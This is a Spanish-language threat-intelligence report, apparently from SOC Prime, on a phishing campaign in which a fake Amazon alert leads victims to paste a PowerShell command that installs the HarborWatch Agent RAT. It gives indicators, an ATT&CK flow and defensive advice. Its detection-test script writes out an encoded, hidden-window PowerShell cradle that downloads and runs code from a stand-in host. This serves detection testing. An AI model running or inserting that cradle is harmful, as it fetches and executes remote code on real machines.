De Falsa Alerta de Seguridad de Amazon a Entrega de Agente HarborWatch

SOC Prime Team

Seguir

De Falsa Alerta de Seguridad de Amazon a Entrega de Agente HarborWatch

Detection stack

AIDR
Alert
ETL
Query

Informe de Amenazas
Flujo de Ataque
Detecciones
Simulaciones

Resumen

El informe detalla una campaña de phishing construida alrededor de una falsa alerta de seguridad de Amazon que engaña a las víctimas para que ejecuten un comando de PowerShell a través de un aviso al estilo ClickFix. Ese comando descarga un ejecutable malicioso llamado mysql.exe, que de hecho es el HarborWatch Agent RAT. Una vez iniciado, el malware se conecta a un servidor de comando y control y transmite información del anfitrión. La operación se basa en dominios similares y un método de autoinfección orientado al usuario para evitar la detección tradicional basada en adjuntos.

Investigación

Cofense rastreó la campaña desde la dirección del remitente falsificada a través de los dominios maliciosos, el descargador de PowerShell, y la carga final del malware. El análisis dinámico de mysql.exe reveló comunicación saliente con un servidor de comando y control en 185.193.127.44 y el uso de las rutas de API /api/agent/tasks/ and /api/heartbeat. El análisis de memoria también expuso el identificador HarborWatchAgent/c-1.1.1.

Mitigación

Las organizaciones deben bloquear los dominios e IPs maliciosos identificados, restringir la ejecución de comandos codificados en PowerShell, monitorear la creación inesperada de mysql.exe en el directorio Temp , y fortalecer las defensas de correo electrónico contra la suplantación de marcas y alertas falsificadas.

Respuesta

Si se detecta esta actividad, aislar el punto final afectado, terminar el proceso de HarborWatch Agent, recopilar evidencia forense, y desplegar un bloqueo basado en indicadores a través del entorno. También se debe advertir a los usuarios sobre la falsa alerta de seguridad de Amazon, y se deben actualizar las protecciones contra phishing para capturar cebos similares.

"graph TB %% Class definitions classDef action fill:#99ccff classDef malware fill:#ff6666 classDef process fill:#ffcc99 classDef file fill:#cccccc %% Nodes initial_access_phishing["Acción – T1566.002 Enlace de Spearphishing El correo electrónico parece ser de Amazon y contiene un enlace de verificación malicioso."] class initial_access_phishing action user_execution_malicious_link["Acción – T1204.001 Ejecución del Usuario: Enlace Malicioso La víctima hace clic en el enlace y es llevada a una página que les instruye a copiar y pegar un comando de PowerShell."] class user_execution_malicious_link action user_execution_copy_paste["Acción – T1204.004 Ejecución del Usuario: Copiar y Pegar El comando de PowerShell copiado se ejecuta localmente."] class user_execution_copy_paste action obfuscation_obfuscated_files["Acción – T1027 Archivos o Información Ofuscados & T1027.018 Unicode Invisible El comando de PowerShell está codificado en base64 y contiene caracteres Unicode ocultos."] class obfuscation_obfuscated_files action deobfuscate_decode["Acción – T1140 Desofuscar/Decodificar Archivos o Información El comando decodifica la carga útil en tiempo de ejecución."] class deobfuscate_decode action hide_artifact_hidden_window["Acción – T1564.003 Ventana Oculta PowerShell se ejecuta con -w hidden para evitar la interfaz de usuario."] class hide_artifact_hidden_window action ingress_tool_transfer["Acción – T1105 Transferencia de Herramientas de Ingreso El script descarga un script de PowerShell de segunda etapa (code.txt) desde un servidor remoto."] class ingress_tool_transfer action server_software_component["Acción – T1505 Componente de Software de Servidor El segundo script recupera y ejecuta una carga útil (mysql.exe) colocada en %TEMP%."] class server_software_component action remote_access_tool["Malware – T1219 Herramienta de Acceso Remoto Se ejecuta un RAT personalizado llamado HarborWatch Agent."] class remote_access_tool malware discovery_security_software["Acción – T1518.001 Descubrimiento de Software de Seguridad El RAT recopila información sobre el software de seguridad."] class discovery_security_software action discovery_hardware["Acción – T1592.001 Descubrimiento de Hardware El RAT recopila detalles del hardware del anfitrión."] class discovery_hardware action discovery_network_appliances["Acción – T1590.006 Aparatos de Seguridad de Red El RAT enumera dispositivos de seguridad de red."] class discovery_network_appliances action discovery_log_enumeration["Acción – T1654 Enumeración de Registros El RAT enumera los registros de eventos."] class discovery_log_enumeration action discovery_threat_vendor["Acción – T1681 Búsqueda de Datos de Proveedor de Amenazas El RAT busca inteligencia de amenazas."] class discovery_threat_vendor action c2_bidirectional["Acción – T1102.002 Comunicación Bidireccional de Servicio Web Los datos se envían al servidor C2 a través de HTTPS."] class c2_bidirectional action c2_oneway["Acción – T1102.003 Comunicación de un Solo Sentido de Servicio Web Instrucciones adicionales recuperadas a través de HTTPS."] class c2_oneway action c2_dynamic_resolution["Acción – T1568 Resolución Dinámica El RAT resuelve dominios C2 en tiempo de ejecución."] class c2_dynamic_resolution action c2_dga["Acción – T1568.002 Algoritmos de Generación de Dominio La lista de dominios se genera algorítmicamente."] class c2_dga action c2_dead_drop_resolver["Acción – T1102.001 Resolver de Entrega Muerta Recupera instrucciones C2 adicionales de un sitio de entrega muerta."] class c2_dead_drop_resolver action exfiltration_c2["Acción – T1041 Exfiltración por Canal C2 La información recopilada se exfiltra a través de la misma web."] class exfiltration_c2 action exfiltration_alternative["Acción – T1048 Exfiltración por Protocolo Alternativo Protocolo alternativo utilizado para la exfiltración de datos."] class exfiltration_alternative action discovery_cloud_dashboard["Acción – T1538 Panel de Control de Servicio en la Nube Los datos se muestran en un panel web en chino (Harbor Sentinel)."] class discovery_cloud_dashboard action %% Connections initial_access_phishing –>|leads to| user_execution_malicious_link user_execution_malicious_link –>|leads to| user_execution_copy_paste user_execution_copy_paste –>|triggers| obfuscation_obfuscated_files obfuscation_obfuscated_files –>|decoded by| deobfuscate_decode deobfuscate_decode –>|executes| hide_artifact_hidden_window hide_artifact_hidden_window –>|downloads| ingress_tool_transfer ingress_tool_transfer –>|downloads| server_software_component server_software_component –>|executes| remote_access_tool remote_access_tool –>|performs| discovery_security_software remote_access_tool –>|performs| discovery_hardware remote_access_tool –>|performs| discovery_network_appliances remote_access_tool –>|performs| discovery_log_enumeration remote_access_tool –>|performs| discovery_threat_vendor remote_access_tool –>|communicates via| c2_bidirectional remote_access_tool –>|receives via| c2_oneway c2_bidirectional –>|uses| c2_dynamic_resolution c2_dynamic_resolution –>|uses| c2_dga c2_oneway –>|uses| c2_dead_drop_resolver remote_access_tool –>|exfiltrates via| exfiltration_c2 exfiltration_c2 –>|may also use| exfiltration_alternative remote_access_tool –>|reports to| discovery_cloud_dashboard "

Flujo de Ataque

Narrativa del Ataque y Comandos:
Un atacante ha obtenido un punto de apoyo en el punto final y desea descargar y ejecutar una carga maliciosa mientras permanece oculto al usuario. Ellos crean un único comando de PowerShell que:
1. Se ejecuta sin un perfil (-nop) para evitar cargar perfiles de usuario.
2. Se inicia en una ventana oculta (-w hidden) para evitar la exposición de la UI (T1564.003).
3. Incorpora un script de shell inversa codificado en base64 para evadir la detección de cadenas simples (T1027.010).
4. Ejecuta el script decodificado mediante -EncodedCommand, aprovechando PowerShell como un binario firmado (T1218).
La línea de comando elaborada coincide con los filtros de CommandLine|contains de la regla Sigma, generando así la alerta esperada.

Script de Prueba de Regresión:

# -------------------------------------------------
# Ejecución maliciosa de PowerShell que debería activar la regla Sigma
# -------------------------------------------------
$payload = 'IEX (New-Object Net.WebClient).DownloadString("http://malicious.example.com/payload.ps1")'
$b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
$cmd = "-nop -w hidden -EncodedCommand $b64"
Start-Process -FilePath "$env:SystemRootSystem32WindowsPowerShellv1.0powershell.exe" `
    -ArgumentList $cmd `
    -WindowStyle Hidden
# Fin del script

Comandos de Limpieza:

# Terminar cualquier proceso residual malicioso de PowerShell
Get-Process -Name powershell -ErrorAction SilentlyContinue | Stop-Process -Force

# Remover cualquier archivo temporal (ninguno creado en este caso)
# Eliminar la variable de payload base64 de la sesión (opcional)
Remove-Variable -Name b64 -ErrorAction SilentlyContinue

Únete a la plataforma Detection as Code de SOC Prime para mejorar la visibilidad de las amenazas más relevantes para tu negocio. Para ayudarte a comenzar y obtener valor inmediato, programa una reunión ahora con los expertos de SOC Prime.

Únete gratis